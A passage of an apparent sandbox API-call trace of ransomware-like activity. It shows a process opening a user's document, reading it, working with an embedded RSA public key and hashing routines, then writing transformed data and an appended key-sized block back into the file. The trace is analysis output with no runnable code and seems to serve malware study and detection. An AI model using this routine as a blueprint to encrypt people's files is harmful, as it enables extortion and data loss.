returned 1 [0192.122] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\XvrsId5WMhv8lJp8.ots") returned=".ots" [0192.122] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\XvrsId5WMhv8lJp8.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\xvrsid5wmhv8ljp8.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.122] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=33114) returned 1 [0192.122] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.125] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8134, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.125] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.127] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.127] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x815a, lpOverlapped=0x0) returned 1 [0192.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.128] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea810) returned 1 [0192.129] CryptCreateHash (in: hProv=0x6ea810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.130] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.130] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.130] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.130] GetLastError () returned 0x0 [0192.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.130] GetLastError () returned 0x0 [0192.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.130] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.130] CryptReleaseContext (hProv=0x6ea810, dwFlags=0x0) returned 1 [0192.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.131] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.131] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.131] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8160) returned 0x2d45778 [0192.132] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0192.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d419b0 [0192.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0192.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d419f8 [0192.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0192.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0192.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.133] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ce8 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39cd0 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0192.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0192.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.136] GetCurrentThreadId () returned 0x264 [0192.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44f30 [0192.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.137] GetCurrentThreadId () returned 0x264 [0192.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0192.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ce8 [0192.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0192.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d48 [0192.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0192.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d60 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d00 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cd0 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0192.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d419f8 | out: hHeap=0x6a0000) returned 1 [0192.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.149] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x8155, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x8155, lpOverlapped=0x0) returned 1 [0192.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.150] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x815a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.150] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.152] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, 